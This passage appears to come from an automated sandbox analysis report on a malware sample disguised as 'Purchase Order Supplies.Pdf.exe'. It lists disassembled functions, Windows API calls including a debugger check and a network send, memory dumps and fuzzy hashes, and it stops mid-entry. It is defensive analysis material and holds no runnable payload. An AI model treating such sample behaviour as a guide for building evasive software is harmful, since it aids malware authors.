                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                          • String ID: X
                          • API String ID: 2727075218-3081909835
                          • Opcode ID: fad7514ebaf285d61c08d1f9cc1a42e1cd686dae6ad2ff35b3527d608ac4577b
                          • Instruction ID: b2d01ced986eb0aa230f1d65be572721f4a9edc163cb99c23ea5ced43c57ec5b
                          • Opcode Fuzzy Hash: fad7514ebaf285d61c08d1f9cc1a42e1cd686dae6ad2ff35b3527d608ac4577b
                          • Instruction Fuzzy Hash: E41186B1A102D8ABCF05DFD8D8096DEBBF9AF45704F04800AE401BB381DBB55B499BB5
                          Function 00C934C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                          Download Yara Rule
                          Strings
                          • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00D034AA
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                          • API String ID: 1029625771-2684727018
                          • Opcode ID: 278655a2d23877c3a4d427f04229d306889de0c6b546045be515f1506ccc2c92
                          • Instruction ID: 4f37d5dff9d20c851512bab4e3f11a7bdace3abe4260663c2217cc95405df14f
                          • Opcode Fuzzy Hash: 278655a2d23877c3a4d427f04229d306889de0c6b546045be515f1506ccc2c92
                          • Instruction Fuzzy Hash: 2BF04F71900249AE8F11EEA4D8959FFB7BCAB10300F148526A82696182EB349B09DB21
                          Function 00D0813B Relevance: 3.2, APIs: 2, Instructions: 212COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: b70fc43b9ea999edccef0188762b7ea112ae181f8a97597bead7166854066263
                          • Instruction ID: 7d2ac857a6f2c446d5e5b6e846d93dc6ff3bdab9b0b6822da18ecc1624efc21e
                          • Opcode Fuzzy Hash: b70fc43b9ea999edccef0188762b7ea112ae181f8a97597bead7166854066263
                          • Instruction Fuzzy Hash: B0816C74A002579BCB24CF48C890AADB7B1FF46318F688529EC599B351D735EE86CB90
                          Function 00CAF461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9c3e09e76ed84cf48fb26684ba431e8b7ebbf074644dfdd4235a2d77c6a6749c
                          • Instruction ID: 8fe7d0bf169bd9f88656172b78e2e0a43e7d0762ecd3476cc4776a329f48c6dd
                          • Opcode Fuzzy Hash: 9c3e09e76ed84cf48fb26684ba431e8b7ebbf074644dfdd4235a2d77c6a6749c
                          • Instruction Fuzzy Hash: B951C2316043029FCB18EF68D491BAA73E5AF89314F14856DF99A8B2D2DB30ED05DB61
                          Function 00CE8065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                          • GetCursorPos.USER32(?), ref: 00CE8074
                          • GetForegroundWindow.USER32 ref: 00CE807A
                            • Part of subcall function 00CE6B19: GetWindowRect.USER32(?,?), ref: 00CE6B2C
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$CursorForegroundRect
                          • String ID:
                          • API String ID: 1066937146-0
                          • Opcode ID: 82112a907b2a4e7f32442c32e92a58848755e4d3a0dfa7284293dc31aa0a8357
                          • Instruction ID: 2046b231f733325fa86f85e1d5ad489a165ebe95da413ebffdca2e8878e46862
                          • Opcode Fuzzy Hash: 82112a907b2a4e7f32442c32e92a58848755e4d3a0dfa7284293dc31aa0a8357
                          • Instruction Fuzzy Hash: 2E316376A00219AFDF00EFA5CC85AEEB7B8FF14314F10442AE956B7251DB34AE45DB90
                          Function 00C91DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          • IsWindow.USER32(00000000), ref: 00D0DB31
                          • IsWindow.USER32(00000000), ref: 00D0DB6B
                            • Part of subcall function 00C91F04: GetForegroundWindow.USER32 ref: 00C91FBE
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Window$Foreground
                          • String ID:
                          • API String ID: 62970417-0
                          • Opcode ID: 657f82d6d889a3665f4da48dd0af6f40279e60f316d3353b9b3969926de743f5
                          • Instruction ID: b5de2529aad54ca13e1c1453250508e5fff580f90734a3d1ed8c10e89f60f93c
                          • Opcode Fuzzy Hash: 657f82d6d889a3665f4da48dd0af6f40279e60f316d3353b9b3969926de743f5
                          • Instruction Fuzzy Hash: B121C072600206AADF10AF74C849FFE77AA9F40784F054429F95AD7181DB30EE01E760
                          Function 00CCE2E8 Relevance: 3.1, APIs: 2, Instructions: 69windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C91952
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00CCE344
                          • _strlen.LIBCMT ref: 00CCE34F
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$Timeout_strlen
                          • String ID:
                          • API String ID: 2777139624-0
                          • Opcode ID: bd614c9bf4382a16622149d49487b7379128610ede024777a387011d99122f74
                          • Instruction ID: 8b7260296ee9bdc2f1ca9336a3a522771beab298bf5e8f0554b9fe9626e3dabc
                          • Opcode Fuzzy Hash: bd614c9bf4382a16622149d49487b7379128610ede024777a387011d99122f74
                          • Instruction Fuzzy Hash: 0B11E73120020467CF04BB69DC86EBF7BA89F46340F00443EF606DB1A2DE64A946A7A0
                          Function 00C93682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                          • 7479C8D0.UXTHEME ref: 00C936E6
                            • Part of subcall function 00CB2025: __lock.LIBCMT ref: 00CB202B
                            • Part of subcall function 00C932DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C932F6
                            • Part of subcall function 00C932DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C9330B
                            • Part of subcall function 00C9374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00C9376D
                            • Part of subcall function 00C9374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00C9377F
                            • Part of subcall function 00C9374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00000104,?,00D51120,C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00D51124,?,?), ref: 00C937EE
                            • Part of subcall function 00C9374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00C93860
                          • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00C93726
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: InfoParametersSystem$CurrentDirectory$7479DebuggerFullNamePathPresent__lock
                          • String ID:
                          • API String ID: 1760729031-0
                          • Opcode ID: 5e7595e536b4c8162d9f9c2a87125faec5c73c9b43990432b073c31946a46679
                          • Instruction ID: 185ab5542905e16f62ac5b0419d9c353f81330658e0c4f87a5de49fb53324187
                          • Opcode Fuzzy Hash: 5e7595e536b4c8162d9f9c2a87125faec5c73c9b43990432b073c31946a46679
                          • Instruction Fuzzy Hash: 9711CD719083419BC300EF69EC09A1EBBE9FB95711F00491EF884C73B1DB709A44CBA2
                          Function 00C94B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00C94C2B,?,?,?,?,00C9BE63), ref: 00C94BB6
                          • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00C94C2B,?,?,?,?,00C9BE63), ref: 00D04972
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 8c32b9011ce0ea0b8672b8ae5ffe2ab785c579010dac196d3d95199d92b1977d
                          • Instruction ID: 08f3812efd8282d00acb4606fe0332a1dabe474490563706d40bcdbfdd7b82c3
                          • Opcode Fuzzy Hash: 8c32b9011ce0ea0b8672b8ae5ffe2ab785c579010dac196d3d95199d92b1977d
                          • Instruction Fuzzy Hash: 6C019270284308BFF7284E28DC8AF667BDCEB15768F108319BAE45A1E0C6B05D468B60
                          Function 00CAF26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                          Download Yara Rule
                          APIs
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF282
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00CDAEA5,?,?,00000000,00000008), ref: 00CAF2A6
                            • Part of subcall function 00CAF2D0: _memmove.LIBCMT ref: 00CAF307
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$_memmove
                          • String ID:
                          • API String ID: 3033907384-0
                          • Opcode ID: a7c7bdcf5dbc88731ca7519926e4516915a8c4d12e2143e7658b47f2b8ea7ab6
                          • Instruction ID: 7a913a66b176fe9bf0ffaed042f91d38e95368302e416df117d97f188873aad5
                          • Opcode Fuzzy Hash: a7c7bdcf5dbc88731ca7519926e4516915a8c4d12e2143e7658b47f2b8ea7ab6
                          • Instruction Fuzzy Hash: 4FF04FB6104214BFAB14AFA5DC44DBB7FADEF8A360710812AFD08CA111DA31DD429671
                          Function 00CBF782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___lock_fhandle.LIBCMT ref: 00CBF7D9
                          • __close_nolock.LIBCMT ref: 00CBF7F2
                            • Part of subcall function 00CB886A: __getptd_noexit.LIBCMT ref: 00CB886A
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                          • String ID:
                          • API String ID: 1046115767-0
                          • Opcode ID: efea79a7877eae49a04b6e666a84720c662e191060ce2f5121dd4c4b765a8899
                          • Instruction ID: 2f529e554e1b921d51bdff68b5711787447c4166dfa1816538f6350c46012ea2
                          • Opcode Fuzzy Hash: efea79a7877eae49a04b6e666a84720c662e191060ce2f5121dd4c4b765a8899
                          • Instruction Fuzzy Hash: B21170328056109FD7117F649C463D87B546F42331F550368E8706B3E3CBB55942EAA1
                          Function 00CE9500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                          Download Yara Rule
                          APIs
                          • send.WS2_32(00000000,?,00000000,00000000), ref: 00CE9534
                          • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00CE9557
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ErrorLastsend
                          • String ID:
                          • API String ID: 1802528911-0
                          • Opcode ID: f3714da77adcdd3f42d217bc43a25a5bf9d97fddacea72b666f5515d072df8af
                          • Instruction ID: fa2a96d9123edd420002b3135b241288cd601c66f78e276679b60d05a8de542d
                          • Opcode Fuzzy Hash: f3714da77adcdd3f42d217bc43a25a5bf9d97fddacea72b666f5515d072df8af
                          • Instruction Fuzzy Hash: F8018F35300200AFC710EF29C891B6AB7E9EF99720F11852EE65AC7391CB70EC01CB60
                          Function 00CB4274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          • __lock_file.LIBCMT ref: 00CB42B9
                            • Part of subcall function 00CB5A9F: __lock.LIBCMT ref: 00CB5AC2
                          • __fclose_nolock.LIBCMT ref: 00CB42C4
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                          • String ID:
                          • API String ID: 2800547568-0
                          • Opcode ID: 340e31cead5e9a969493ec3b3f30908a8c26829c03d4bdf76bb6d8f51d5b9ec0
                          • Instruction ID: 8251f2222c6f3349cba78d2c8d8d0c0a22219e8a5655b64f1f99e19777e070fe
                          • Opcode Fuzzy Hash: 340e31cead5e9a969493ec3b3f30908a8c26829c03d4bdf76bb6d8f51d5b9ec0
                          • Instruction Fuzzy Hash: 35F0B4318097159ADB15AB7588027EE67D0AF81334F228309F825AB1C3CB7C8A01BB52
                          Function 00CAF55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                          Download Yara Rule
                          APIs
                          • timeGetTime.WINMM ref: 00CAF57A
                            • Part of subcall function 00C9E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9E279
                          • Sleep.KERNEL32(00000000), ref: 00D075D3
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessagePeekSleepTimetime
                          • String ID:
                          • API String ID: 1792118007-0
                          • Opcode ID: 4563e67b64200a964b60e99af2099efbfb9a0b2a0275619a2412b7ddafd2f6f9
                          • Instruction ID: 7805b5c90048f2e4d4ec760597587e7f89b5b8552185c073664a58ab53e73d4c
                          • Opcode Fuzzy Hash: 4563e67b64200a964b60e99af2099efbfb9a0b2a0275619a2412b7ddafd2f6f9
                          • Instruction Fuzzy Hash: 79F08C71240719AFD314EF69D849B96BBE9EF68320F00442AF81AC7391DF70A800CBE0
                          Function 00C981C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • __wcsnicmp.LIBCMT ref: 00C983C4
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __itow__swprintf__wcsnicmp
                          • String ID:
                          • API String ID: 712828618-0
                          • Opcode ID: 8ab493cf396f586e988fbb2cd5b1780cf546e8ed0e37217accfc2a0838a8d3ce
                          • Instruction ID: 5a4deaf434f4324aa7b8a28f4ae7814bbf251dda08a0a62e11d17b9925c3f64e
                          • Opcode Fuzzy Hash: 8ab493cf396f586e988fbb2cd5b1780cf546e8ed0e37217accfc2a0838a8d3ce
                          • Instruction Fuzzy Hash: C3F19E71508302AFCB04DF18C89586FBBE5FF99304F54891DF98A97261EB30EA09DB52
                          Function 00CA4040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca55a8790d7cd0e5e7960c90d9e329dd0bff79563238d8607ea337c53e4f0b64
                          • Instruction ID: 6605c1384fa817319061f497b0f0744c5cd077634eff09989afc320d802af2d6
                          • Opcode Fuzzy Hash: ca55a8790d7cd0e5e7960c90d9e329dd0bff79563238d8607ea337c53e4f0b64
                          • Instruction Fuzzy Hash: 0061B4B0A002079FCB04DF55C880A7EB7E4FF55318F148669EA2A8B291E770ED95DB91
                          Function 00CAEF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62be54aff8397159c8942ebe69c08661c0b1fccbb7d02c8891a89aa6d47f70e3
